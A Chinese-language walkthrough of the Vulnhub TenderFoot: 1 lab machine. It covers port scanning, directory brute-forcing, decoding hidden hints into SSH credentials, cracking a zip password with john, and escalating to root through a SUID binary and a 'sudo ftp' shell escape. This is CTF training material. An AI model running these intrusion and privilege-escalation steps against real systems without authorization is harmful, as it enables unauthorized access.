Vulnhub之TenderFoot 1靶机详细测试过程
Tender
作者:jason_huawen
靶机基本信息
名称:TenderFoot: 1
地址:
https://www.vulnhub.com/entry/tenderfoot-1,581/
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.69.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:1b:5b:15 1 60 PCS Systemtechnik GmbH
192.168.56.239 08:00:27:1b:eb:34 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.239
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.239 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-29 08:21 EST
Nmap scan report for bogon (192.168.56.239)
Host is up (0.000070s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:b7:2d:95:e1:06:7f:a3:f1:8e:bc:5b:4c:29:19:61 (RSA)
| 256 42:0c:c9:6d:1d:e9:84:19:6a:8a:d5:51:2c:69:c6:98 (ECDSA)
|_ 256 14:4d:74:42:78:67:9b:f3:dd:00:40:24:4d:12:c9:de (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:1B:EB:34 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.64 seconds
NMAP扫描结果表明目标主机有2个开放端口22(SSH)、80(HTTP)
Get Access
访问80端口,返回apche2默认页面,但是页面源代码中有下述信息:
<!--
G00D!
check /robots.txt directory.
-->
作者提示需要检查一下/robots.txt中的目录,那就下载一下/robots.txt文件:
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ curl http://192.168.56.239/robots.txt
Found Something ?
Here is a directory open it
/hint
提示有目录/hint:
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ curl http://192.168.56.239/hint/
<!--
EBPV6X27L5PV6X27L5PV6X27L5PV6X27L4FHYICOGB2GQ2LOM4QEQZLSMUQSAIBAEAQCA7AKPQQFI4TZEBZW63LFORUGS3THEBSWY43FEF6AUIBNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LIKIVXHK3LFOJQXIZJANVXXEZJAHIUQ====
Decrypt it!
-->
看起来是base64编码,试一下是否可以解码:
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ echo 'EBPV6X27L5PV6X27L5PV6X27L5PV6X27L4FHYICOGB2GQ2LOM4QEQZLSMUQSAIBAEAQCA7AKPQQFI4TZEBZW63LFORUGS3THEBSWY43FEF6AUIBNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LIKIVXHK3LFOJQXIZJANVXXEZJAHIUQ====' | base64 -d
��}�/���}�/���}�/���}�/�G`��▒�Cb�3�A��1D�@�
=#��V�r�9Kt��c��^�P�ME�زME�زME�زME�ز
!U�+r�8�!�@5U��@�base64: invalid input
利用base64解码以后是乱码,还是用cyberchef在线工具逐一尝试一下各种不同编码:
最后尝试通过base32解码,但是解码以后的信息却是(哈哈):
| N0thing Here! |
| Try something else!|
--------------------
Enumerate more :)
那接下来做一下目录扫描:
┌──(kali㉿kali)-[~/Vulnhub/Tender]
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ gobuster dir -u http://192.168.56.239 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.239
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/29 08:28:59 Starting gobuster in directory enumeration mode
===============================================================
/hint (Status: 301) [Size: 315] [--> http://192.168.56.239/hint/]
/server-status (Status: 403) [Size: 279]
Progress: 217209 / 220561 (98.48%)===============================================================
2022/11/29 08:29:24 Finished
只扫出来一个已知的目录,需要换个字典继续扫描,此次又扫描出一个目录:
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ gobuster dir -u http://192.168.56.239 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.239
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/29 08:46:59 Starting gobuster in directory enumeration mode
===============================================================
/fotocd (Status: 301) [Size: 317] [--> http://192.168.56.239/fotocd/]
Progress: 141014 / 141709 (99.51%)===============================================================
2022/11/29 08:47:16 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ curl http://192.168.56.239/fotocd/
<!--
+++++ ++[-> +++++ ++<]> +++++ +++++ ++... ..... ..... ....< +++++ +[->-
----- <]>-- ----- ----- .---. <++++ ++++[ ->+++ +++++ <]>.- ----- .<+++
+++[- >++++ ++<]> +++.< +++++ ++[-> ----- --<]> ----- .<+++ ++[-> +++++
<]>+. +++++ .<+++ +[->+ +++<] >++++ +++.< +++[- >+++< ]>+++ .<+++ +++[-
>---- --<]> ----- ----. ----- ----. ----. .<+++ +++[- >---- --<]> -----
----- --.-- -.<++ +++++ [->++ +++++ <]>++ ..... ..... ..... ..<++ ++++[
->--- ---<] >---- ----- ---.- --.++ +.--- .<+++ ++++[ ->+++ ++++< ]>+++
+++++ +.<++ ++++[ ->+++ +++<] >+.-- ---.< +++++ +++[- >---- ----< ]>---
-.<++ +++++ ++[-> +++++ ++++< ]>+++ +++++ .<+++ [->-- -<]>- .++++ ++.<+
+++++ +++[- >---- ----- <]>-- --.<+ +++++ ++[-> +++++ +++<] >++++ ++.++
+++++ ++.++ ++++. ----- --.<+ ++[-> ---<] >-.<+ +++++ ++[-> ----- ---<]
>---- .<+++ +++++ +[->+ +++++ +++<] >++++ .--.< +++[- >---< ]>--- --.<+
++[-> +++<] >++++ .---- .<+++ [->-- -<]>- ---.< +++[- >+++< ]>+++ .----
----. <++++ ++++[ ->--- ----- <]>-- ---.< +++++ [->++ +++<] >++++ ++.<+
+++++ +[->- ----- -<]>- .---. <++++ +++++ [->++ +++++ ++<]> +++++ +++++
++++. ---.< +++++ +++[- >---- ----< ]>--- ---.< +++++ ++++[ ->+++ +++++
+<]>+ +++++ ++.<+ +++[- >---- <]>-- --.<+ ++[-> +++<] >++++ +.<++ +++++
[->-- ----- <]>-- ----- -.<++ ++++[ ->--- ---<] >---- ----- .---. <++++
[->++ ++<]> +++++ +.... <++++ +++[- >++++ +++<] >+++. <++++ [->++ ++<]>
++++. ---.+ +++++ +++.< +++++ +++[- >---- ----< ]>--- ----- ----- -.<++
+++++ ++[-> +++++ ++++< ]>+++ +++++ .<+++ [->-- -<]>- .++++ ++.<+ +++++
+++[- >---- ----- <]>-- --.<+ +++++ ++[-> +++++ +++<] >++++ ++++. -----
--.<+ +++[- >++++ <]>++ +++.< ++++[ ->--- -<]>- .<+++ +++++ [->-- -----
-<]>- ----. <++++ ++++[ ->+++ +++++ <]>++ +.<++ +[->+ ++<]> +++++ +.<++
+[->- --<]> ----. -.<++ +++++ [->-- ----- <]>-- ---.< +++[- >---< ]>---
--.<+ +++++ ++[-> +++++ +++<] >++++ +++++ +++++ +.--- ----- -.<++ +++++
+[->- ----- --<]> ----- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++
.-.-- ----- --.<+ +++++ ++[-> ----- ---<] >---- -.<++ +++++ ++[-> +++++
++++< ]>+++ +.--. <+++[ ->--- <]>-- ---.< +++[- >+++< ]>+++ +.<++ +++++
+[->- ----- --<]> ----- -.<++ +[->- --<]> ---.< +++++ +++[- >++++ ++++<
]>+++ ++.++ +++++ ++.++ ++++. <+++[ ->--- <]>-- ----. <+++[ ->+++ <]>++
++.<+ +++++ +++[- >---- ----- <]>-. <++++ ++++[ ->+++ +++++ <]>++ +++++
++.++ +++.+ +++++ .---- -.<++ +++++ +[->- ----- --<]> ----- ----- -----
.<+++ +++++ +[->+ +++++ +++<] >++++ .--.< +++[- >---< ]>--- --.<+ ++[->
+++<] >++++ .<+++ +++++ +[->- ----- ---<] >-.<+ +++++ ++[-> +++++ +++<]
>+.++ ..<++ +[->+ ++<]> +++.+ +++++ .---- ---.+ +++++ .<+++ +++++ +[->-
----- ---<] >---. <++++ [->-- --<]> ---.- --.<+ +++[- >++++ <]>++ ++++.
...<+ +++++ ++[-> +++++ +++<] >++.< ++++[ ->+++ +<]>+ +++++ +.<++ +++++
++[-> ----- ----< ]>--- ----- .<+++ +++++ +[->+ +++++ +++<] >++.. <+++[
->--- <]>-- .<+++ +++++ [->-- ----- -<]>- ----- --.<+ +++++ ++[-> +++++
+++<] >++++ +++++ +++++ ++.-. +++.+ +.<++ +++++ +[->- ----- --<]> -----
-.<++ +[->- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >++.+ +++++ .<+++
[->-- -<]>- -.+++ +++.< ++++[ ->--- -<]>- --.<+ +++[- >++++ <]>++ +++++
.<+++ ++++[ ->--- ----< ]>--- ----- ----- .<+++ +++++ [->++ +++++ +<]>+
.---- ----. .<+++ [->-- -<]>- -.<++ +++++ +[->- ----- --<]> ----- ---.<
+++++ ++++[ ->+++ +++++ +<]>+ +++.- -.<++ +[->- --<]> ----- .<+++ [->++
+<]>+ +++.- ---.< +++[- >---< ]>--- -.<++ +[->+ ++<]> +++.- ----- --.<+
+++++ [->-- ----< ]>-.+ +++++ +++.+ +++++ +.<++ ++++[ ->+++ +++<] >++++
+++++ .<+++ +++++ ++[-> ----- ----- <]>-- ----- ----- .---. <++++ +++++
[->++ +++++ ++<]> +++++ +++++ ++++. ---.< +++++ +++[- >---- ----< ]>---
---.< +++++ +++[- >++++ ++++< ]>+++ +++++ +++++ +.+.+ ++++. <++++ +++[-
>---- ---<] >---- ----- .<+++ +++[- >---- --<]> ----- ----. ---.< ++++[
->+++ +<]>+ +++++ ....< +++++ ++[-> +++++ ++<]> +++.< ++++[ ->+++ +<]>+
+++.- --.++ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- ----- .<+++
+++++ [->++ +++++ +<]>+ ++++. +++++ ++++. +++++ ++.-- ----- -.--- -----
.<+++ [->++ +<]>+ +++.< ++++[ ->--- -<]>- .<+++ +[->+ +++<] >+++. <+++[
->--- <]>-- ----. <++++ ++++[ ->--- ----- <]>-- ---.< +++++ +++[- >++++
++++< ]>+++ +++++ +++++ .++.+ ++.<+ ++[-> ---<] >---- .<+++ +++++ [->--
----- -<]>- ----. <++++ +[->+ ++++< ]>+.< ++++[ ->--- -<]>- .<+++ ++[->
----- <]>-- -.--- .<+++ +[->+ +++<] >++++ ++... .<+++ +++[- >++++ ++<]>
+++.< ++++[ ->--- -<]>- ----- -..<+ +++[- >++++ <]>++ ++.<+ +++++ [->--
----< ]>.<+ +++++ [->++ ++++< ]>+++ +++++ .++++ +++++ .<+++ +[->- ---<]
>--.+ +++++ ++.<+ +++++ [->-- ----< ]>--- ----. +.<++ ++[-> ----< ]>---
-.--- .<
What is this?
Ask to G00GLE !
这是brainfuck加密的信息
通过在线网站解密以后得到:
=================
JDk5OTkwJA==
=================
Did you found username ?
if yes:
Then you have cred. of one user, enter into user account
by ssh port. syntax:{ssh username@IP}
if not:
Then enumerate more :)
G00D LUCK !
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ echo 'JDk5OTkwJA==' | base64 -d
$99990$
现在知道了密码,但是不知道用户名?
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ gobuster dir -u http://192.168.56.239 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x .php,.js,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.239
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: sh,html,php,js,txt
[+] Timeout: 10s
===============================================================
2022/11/29 08:59:19 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 11422]
/robots.txt (Status: 200) [Size: 191]
/entry.js (Status: 200) [Size: 7]
发现了/entry.js(这个步骤很关键,之前的渗透测试只查看.html,.sh,.php,.txt文件,却从来没有查看js文件)
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ curl http://192.168.56.239/entry.js
monica
这应该是用户名,因此SSH登录该用户monica:
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ ssh monica@192.168.56.239
monica@192.168.56.239's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
39 packages can be updated.
26 updates are security updates.
Last login: Mon Oct 5 01:21:39 2020 from 10.0.2.60
monica@TenderFoot:~$ id
uid=1001(monica) gid=1001(monica) groups=1001(monica)
monica@TenderFoot:~$ sudo -l
[sudo] password for monica:
Sorry, user monica may not run sudo on TenderFoot.
monica@TenderFoot:~$ ls -alh
total 36K
drwxr-xr-x 4 monica monica 4.0K Oct 4 2020 .
drwxr-xr-x 4 root root 4.0K Oct 4 2020 ..
-rw-r--r-- 1 root root 593 Oct 4 2020 .bash_history
-rw-r--r-- 1 monica monica 220 Oct 4 2020 .bash_logout
-rw-r--r-- 1 monica monica 3.7K Oct 4 2020 .bashrc
drwx------ 2 monica monica 4.0K Oct 4 2020 .cache
drwxr-xr-x 3 root root 4.0K Oct 4 2020 joey
-rw-r--r-- 1 monica monica 655 Oct 4 2020 .profile
-rw-r--r-- 1 root root 2.8K Oct 4 2020 user1.txt
monica@TenderFoot:~$ cat user1.txt
@@@@@@@,
@@@@@@@@@&
&@@@@@@@@@@*
@@@@@@@@@@@@,
.@@@@@@@@@@@@@
@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@
/@@@@@@@@@@@@@@@&
.@@@@@@@@@@@@@@@@@,
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*
(%%%%%%%%%%%%* ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&.
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@(
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/
@@@@@@@@@@@@@@@% @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.
========================================================
========================================================
Great! Y0U F0UND Y0UR FIR5T FL4G!
Try to Find out user2.txt (your 2nd flag) :)
========================================================
========================================================
monica@TenderFoot:~$ find / -name user2.txt -type f 2>/dev/null
monica@TenderFoot:~$ cat .bash_history
======================================================================================
======================================================================================
It's G00D to check bash history, sometimes we got hints from history.
it contains all commands which are execute earlier, mayb be those commands when this box was created !
But unfortunately i haven't leave anything here :)
Try Something Else!
======================================================================================
======================================================================================
monica@TenderFoot:~$
monica@TenderFoot:~$ cd joey
monica@TenderFoot:~/joey$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 4 2020 .
drwxr-xr-x 4 monica monica 4.0K Oct 4 2020 ..
drwxr-xr-x 3 root root 4.0K Oct 4 2020 have
monica@TenderFoot:~/joey$ cd have
monica@TenderFoot:~/joey/have$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 4 2020 .
drwxr-xr-x 3 root root 4.0K Oct 4 2020 ..
drwxr-xr-x 3 root root 4.0K Oct 4 2020 a
monica@TenderFoot:~/joey/have$ cd a
monica@TenderFoot:~/joey/have/a$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 4 2020 .
drwxr-xr-x 3 root root 4.0K Oct 4 2020 ..
drwxr-xr-x 3 root root 4.0K Oct 4 2020 gift
monica@TenderFoot:~/joey/have/a$ cd gift
monica@TenderFoot:~/joey/have/a/gift$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 4 2020 .
drwxr-xr-x 3 root root 4.0K Oct 4 2020 ..
drwxr-xr-x 3 root root 4.0K Oct 4 2020 for
monica@TenderFoot:~/joey/have/a/gift$ cd for
monica@TenderFoot:~/joey/have/a/gift/for$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 4 2020 .
drwxr-xr-x 3 root root 4.0K Oct 4 2020 ..
drwxr-xr-x 2 root root 4.0K Oct 4 2020 monica
monica@TenderFoot:~/joey/have/a/gift/for$ cd monica
monica@TenderFoot:~/joey/have/a/gift/for/monica$ ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Oct 4 2020 .
drwxr-xr-x 3 root root 4.0K Oct 4 2020 ..
-rw-r--r-- 1 root root 53 Oct 4 2020 note.txt
monica@TenderFoot:~/joey/have/a/gift/for/monica$ cat note.txt
Got to /fotocd/0x0343548764 directory in browser.
monica@TenderFoot:~/joey/have/a/gift/for/monica$
──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ curl http://192.168.56.239/fotocd/0x0343548764/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /fotocd/0x0343548764</title>
</head>
<body>
<h1>Index of /fotocd/0x0343548764</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/fotocd/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/compressed.gif" alt="[ ]"></td><td><a href="joey.zip">joey.zip</a></td><td align="right">2020-10-04 18:00 </td><td align="right">911 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="note.txt">note.txt</a></td><td align="right">2020-10-04 18:01 </td><td align="right"> 48 </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.239 Port 80</address>
</body></html>
将两个文件下载到Kali Linux本地
提权
──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ mv ~/Downloads/joey.zip .
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ ls
joey.zip nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ unzip joey.zip
Archive: joey.zip
[joey.zip] gift.zip password:
extracting: gift.zip
inflating: note.txt
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ ls
gift.zip joey.zip nmap_full_scan note.txt
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ cat note.txt
=======================================================
=======================================================
Not this time DUDE!
Just G00GLE and learn how to crack zip passwords :)
you will learn new thing!
=======================================================
=======================================================
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ unzip gift.zip
Archive: gift.zip
[gift.zip] gift.txt password:
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ zip2john gift.zip > zip_hash
ver 2.0 efh 5455 efh 7875 gift.zip/gift.txt PKZIP Encr: TS_chk, cmplen=255, decmplen=717, crc=52CFB060 ts=8D77 cs=8d77 type=8
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ ls
gift.zip joey.zip nmap_full_scan note.txt zip_hash
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
h4ck3d (gift.zip/gift.txt)
1g 0:00:00:00 DONE (2022-11-29 09:05) 1.282g/s 9914Kp/s 9914Kc/s 9914KC/s h4mepl..h0tdamn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ unzip gift.zip
Archive: gift.zip
[gift.zip] gift.txt password:
inflating: gift.txt
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ ls
gift.txt gift.zip joey.zip nmap_full_scan note.txt zip_hash
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ cat gift.
cat: gift.: No such file or directory
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ cat gift.
cat: gift.: No such file or directory
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ cat gift.txt
===================================================================================================
===================================================================================================
Hahaha! there is no gift !
Your Bad Luck!
But what happened if you don't get gift.
Take a hint from my side, which may help you to solve this box further.
I make a binary to get another user's shell,
Just google, command for search/find SUID or binaries and figure it out how to execute this binary.
G00D LUCK! :)
=================================================================================================
monica@TenderFoot:/var/www/html/fotocd$ find / -perm -4000 -type f 2>/dev/null
/bin/ping6
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/opt/exec/chandler
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/netkit-ftp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/chfn
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
monica@TenderFoot:/var/www/html/fotocd$ /opt/exec/chandler
chandler@TenderFoot:/var/www/html/fotocd$ id
uid=1000(chandler) gid=1000(chandler) groups=1000(chandler),1001(monica)
chandler@TenderFoot:/var/www/html/fotocd$
根据提示执行chandler程序即可得到chandler的shell
chandler@TenderFoot:/home/chandler$ ls
note.txt
chandler@TenderFoot:/home/chandler$ cat note.txt
go to root folder and grab your final flag :)
chandler@TenderFoot:/tmp$
chandler@TenderFoot:/tmp$ cd /home
chandler@TenderFoot:/home$ ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Oct 4 2020 .
drwxr-xr-x 23 root root 4.0K Oct 4 2020 ..
drwxr-xr-x 4 chandler chandler 4.0K Oct 4 2020 chandler
drwxr-xr-x 4 monica monica 4.0K Oct 4 2020 monica
chandler@TenderFoot:/home$ cd chandler/
chandler@TenderFoot:/home/chandler$ ls -alh
total 36K
drwxr-xr-x 4 chandler chandler 4.0K Oct 4 2020 .
drwxr-xr-x 4 root root 4.0K Oct 4 2020 ..
-rw------- 1 chandler chandler 8 Oct 4 2020 .bash_history
-rw-r--r-- 1 chandler chandler 220 Oct 4 2020 .bash_logout
-rw-r--r-- 1 chandler chandler 3.7K Oct 4 2020 .bashrc
drwx------ 2 chandler chandler 4.0K Oct 4 2020 .cache
drwxrwxr-x 2 chandler chandler 4.0K Oct 4 2020 .nano
-rw-r--r-- 1 root root 48 Oct 4 2020 note.txt
-rw-r--r-- 1 chandler chandler 655 Oct 4 2020 .profile
-rw-r--r-- 1 chandler chandler 0 Oct 4 2020 .sudo_as_admin_successful
chandler@TenderFoot:/home/chandler$ cd .cache
chandler@TenderFoot:/home/chandler/.cache$ ls -alh
total 16K
drwx------ 2 chandler chandler 4.0K Oct 4 2020 .
drwxr-xr-x 4 chandler chandler 4.0K Oct 4 2020 ..
-rw-r--r-- 1 chandler chandler 0 Oct 4 2020 motd.legal-displayed
-rw-r--r-- 1 root root 655 Oct 4 2020 note.txt
-rw-r--r-- 1 root root 775 Oct 4 2020 user2.txt
chandler@TenderFoot:/home/chandler/.cache$ cat user2.txt
██████╗ ██████╗ ██████╗ ██╗ ██╗
██╔════╝██╔═████╗██╔═████╗██║ ██║
██║ ██║██╔██║██║██╔██║██║ ██║
██║ ████╔╝██║████╔╝██║██║ ╚═╝
╚██████╗╚██████╔╝╚██████╔╝███████╗██╗
╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝
===================================
Great You got your 2nd Flag too! :)
You are one step away from root!
===================================
chandler@TenderFoot:/home/chandler/.cache$ cat note.txt
================================================================================
If you have reach till here, congrats you solved 90% of the B0X!
Now your next task is to get root shell! , for that i use binary
like previously you did to get chandler's shell. Same you have to do
difference is monica can not run sudo commands but chandler can run sudo
commands. I'll give you a master key, this may be help you somewhere :)
When you found SUID/binary then search how to get root shell by this binary
GTFOBins may help you.
KEY --> OBQXG43XMQ5FSMDVINZDIY3LJUZQ====
密码同样是base32编码,用cyberchef解码:
Y0uCr4ckM3
然后SSH登录chandler用户
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ ssh chandler@192.168.56.239
chandler@192.168.56.239's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
39 packages can be updated.
26 updates are security updates.
Last login: Sun Oct 4 18:48:22 2020 from 10.0.2.60
chandler@TenderFoot:~$ sudo -l
Matching Defaults entries for chandler on TenderFoot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User chandler may run the following commands on TenderFoot:
(root) NOPASSWD: /usr/bin/ftp
chandler@TenderFoot:~$ sudo /usr/bin/ftp
ftp> !/bin/sh
# cd /root
# ls -alh
total 32K
drwx------ 4 root root 4.0K Oct 4 2020 .
drwxr-xr-x 23 root root 4.0K Oct 4 2020 ..
-rw------- 1 root root 0 Oct 4 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
drwx------ 2 root root 4.0K Oct 4 2020 .cache
-rw-r--r-- 1 root root 708 Oct 4 2020 last_note.txt
drwxr-xr-x 2 root root 4.0K Oct 4 2020 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 1.4K Oct 4 2020 proof.txt
# cat proof.txt
**************************************************************************************************************
'########:'########:'##::: ##:'########::'########:'########::'########::'#######:::'#######::'########:'####:*
... ##..:: ##.....:: ###:: ##: ##.... ##: ##.....:: ##.... ##: ##.....::'##.... ##:'##.... ##:... ##..:: ####:*
::: ##:::: ##::::::: ####: ##: ##:::: ##: ##::::::: ##:::: ##: ##::::::: ##:::: ##: ##:::: ##:::: ##:::: ####:*
::: ##:::: ######::: ## ## ##: ##:::: ##: ######::: ########:: ######::: ##:::: ##: ##:::: ##:::: ##::::: ##::*
::: ##:::: ##...:::: ##. ####: ##:::: ##: ##...:::: ##.. ##::: ##...:::: ##:::: ##: ##:::: ##:::: ##:::::..:::*
::: ##:::: ##::::::: ##:. ###: ##:::: ##: ##::::::: ##::. ##:: ##::::::: ##:::: ##: ##:::: ##:::: ##::::'####:*
::: ##:::: ########: ##::. ##: ########:: ########: ##:::. ##: ##:::::::. #######::. #######::::: ##:::: ####:*
:::..:::::........::..::::..::........:::........::..:::::..::..:::::::::.......::::.......::::::..:::::....::*
*************************************************************************************************************
Congratulations! you found last flag of tenderfoot :)
I'll be glad if you take screenshot of this and give me feedback on,
Twitter --> (@_Anant_chauhan)
Discord --> (infinity_#9175)
Linkedin --> (https://www.linkedin.com/in/anant-chauhan-a07b2419b)
#
经验教训
-
在做目录扫描的时候,作者提示需要enumerate more,那就应该用更多或者更大字典,不能想歪了;
-
